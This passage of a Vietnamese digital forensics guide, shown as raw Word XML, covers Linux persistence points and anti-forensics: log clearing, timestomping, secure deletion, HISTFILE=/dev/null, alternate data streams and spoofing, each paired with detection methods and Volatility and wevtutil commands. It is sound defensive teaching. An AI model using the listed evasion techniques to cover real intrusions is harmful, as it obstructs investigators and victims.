            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="559AC46B">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1ADA5454">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rc.local</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0DD0D8E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Script khởi động kiểu cũ.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3F84A7DC">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089C19F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At Jobs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1B2CE0C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 xml:space="preserve">Tác vụ chạy một lần trong </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>/var/spool/at</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="34051EF5">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238E4B29">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LD_PRELOAD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F804DB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Tiêm thư viện ở cấp tiến trình thông qua biến môi trường.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="61"/>
      <w:bookmarkEnd w:id="63"/>
    </w:tbl>
    <w:p w14:paraId="50DB0FA2">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="kỹ-thuật-chống-pháp-chứng"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>13. Kỹ thuật chống pháp chứng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE46A17">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i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Kẻ tấn công cố che giấu như thế nào và chuyên viên vẫn tìm ra dấu vết ra sao.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684125D5">
      <w:pPr>
        <w:pStyle w:val="3"/>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Chống pháp chứng (anti-forensics) bao gồm các kỹ thuật nhằm cản trở, đánh lạc hướng hoặc phá hủy quá trình điều tra số. Hiểu các kỹ thuật này giúp nhận biết khi chúng đã được sử dụng và xây dựng phương pháp đối phó. Bản thân hành vi che giấu thường để lại dấu vết có giá trị pháp chứng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9BE6FC">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="phân-loại-kỹ-thuật"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>13.1. Phân loại kỹ thuật</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="13"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3126"/>
        <w:gridCol w:w="6920"/>
      </w:tblGrid>
      <w:tr w14:paraId="1040D2A2">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689BBD8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Nhóm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4FADA77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Ví dụ và mục tiêu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7108A8CB">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5D6470F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Phá hủy dữ liệu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3AE1D0A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Secure deletion, wipe ổ đĩa, khử từ, phá hủy vật lý.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="64EC18B1">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04C27A0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Che giấu dữ liệu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="18E84CD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Steganography, Alternate Data Streams, mã hóa tệp và phân vùng ẩn.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7B3ADD81">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4C87499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Thao túng metadata</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1445CBC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Timestomping, đổi tên và thay đổi thuộc tính/hash.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="28DD11C2">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1723E46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Thao túng log</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="37764BC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Xóa Windows Event Log, xóa bash history và sửa syslog.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="594F0174">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07D2A83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Mã hóa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5F101F5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Full-disk encryption hoặc container mã hóa nhằm ngăn truy cập nếu không có khóa.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="30A1C4D1">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3996E60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Làm rối</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="79150BD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Packing, encoding và steganography trong liên lạc để che mã độc hoặc dữ liệu.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6BCB2AB6">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B59BA4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Che giấu nguồn - Trail Laundering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="134A8DD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Tor, VPN, proxy, Wi-Fi công cộng hoặc hệ thống bên thứ ba bị chiếm quyền.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="14483FFB">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58C2B1A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Giả mạo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1E6F843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MAC/IP spoofing và giả timestamp để tạo danh tính sai.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5EB2EFCE">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28745E8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Gây nhiễu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="513AE86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Flood log, tạo nhiều tệp tương tự hoặc cố tình đánh lạc hướng.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="178FF211">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2145839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Chống phân tích</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31E8380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Phát hiện sandbox, debugger hoặc VM để ngăn phân tích mã độc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="65"/>
    </w:tbl>
    <w:p w14:paraId="2E6AEB63">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="phát-hiện-và-đối-phó"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>13.2. Phát hiện và đối phó</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="13"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2060"/>
        <w:gridCol w:w="7986"/>
      </w:tblGrid>
      <w:tr w14:paraId="620847CE">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2D93357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Dấu hiệu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="747BF26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Cách phát hiện</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1D5F8D3C">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53E7E50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Secure deletion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A18D2EE">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srm</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>shred</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> có thể để lại mẫu trong slack space; SSD TRIM làm giảm khả năng phục hồi nhưng không phải lúc nào cũng xóa đồng bộ mọi bản sao.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4CD0FDFD">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43CD321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Timestomping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="00EDF0B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 xml:space="preserve">So sánh </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>$STANDARD_INFORMATION</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> và </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>$FILE_NAME</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>; bất nhất là dấu hiệu thao túng.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6D9B8A3D">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2A7C728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Event Log bị xóa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="032D0F3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Event ID 1102 ghi lại việc xóa Security Audit Log.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="49D57BFE">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170D9E5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Bash history bị xóa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6394BFE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 xml:space="preserve">Kiểm tra RAM bằng Volatility; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>$HISTFILE=/dev/null</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> cũng là một phát hiện.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1AA60F65">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768C45C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Container mã hóa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="00D94A6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VeraCrypt/TrueCrypt có thể vẫn hiện diện trên đĩa dù không đọc được; phân tích header và mount history.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="68783FCE">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18DAB8D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Alternate Data Streams</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3874CD3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 xml:space="preserve">Kiểm tra thuộc tính </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>$DATA</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> trong MFT và dùng </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>dir /r</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="361011FC">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1FA0690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Steganography</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="14A8939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Thử kiểm định thống kê, so sánh kích thước bất thường và công cụ steganalysis.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="05A96E69">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68E6C35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Log flooding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1DEC5A6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Flooding tự tạo ra mẫu bất thường về tần suất và khối lượng log.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="33DEA515">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="phát-hiện-xóa-event-log"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Phát hiện xóa Event Log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F4A86F">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65"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>python3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> vol.py </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="67"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> memory.raw windows.evtlogs</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65"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>wevtutil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> qe Security </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="51"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"/q:*[System[(EventID=1102)]]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FCFE91">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Ví dụ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FA0798">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39"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2026-01-14T22:46:01 EventID 1102: Security audit log was cleared</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="39"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>OperatorName: suspect\Administrator</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="67"/>
    <w:p w14:paraId="6D0DBA52">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
